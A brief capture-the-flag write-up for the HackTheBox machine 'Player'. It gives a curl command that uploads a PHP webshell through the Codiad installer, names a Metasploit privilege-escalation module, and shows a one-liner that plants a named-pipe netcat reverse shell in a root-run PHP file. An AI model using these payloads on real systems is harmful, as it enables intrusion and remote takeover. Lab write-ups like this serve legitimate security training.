Player @ HackTheBox

Player @ HackTheBox

Player is a hard box, that we solved in unintended ways that are partly patched now.

User & Root

Enumerating subdomains we find: staging.player.htb, dev.player.htb, chat.player.htb. On dev.player.htb we have codiad cms, where we can exploit the installer under the condition that a writable directory for the webserver exists, resulting in a shell as www-data (thanks mprox):

# Upload webshell
curl -X POST -d 'project_name=<?php echo system($_GET['xcmd']);?>' -d 'project_path=/var/www/html/launcher/xct/data' -d 'path=/var/www/html/launcher/xct' http://dev.player.htb/components/install/process.php
# Run command
# Get shell (url encoded perl reverse shell)

After getting shell metasploits “exploit/linux/local/bpf_sign_extension_priv_esc” could be used to get root and grab both flags.

Another way for root is to adjust “dee8dc8a47256c64630d803a4c40786g.php” so it gives a shell, because it is included in “/var/lib/playbuff/buff.php”, which is called periodically as root (thanks InfoSecJack):

printf '%s\n%s' '<?php echo system("mknod /tmp/x p;/bin/sh 0</tmp/x | nc <ip> 8000 1>/tmp/x");?>' "$(cat dee8dc8a47256c64630d803a4c40786g.php)" > dee8dc8a47256c64630d803a4c40786g.php

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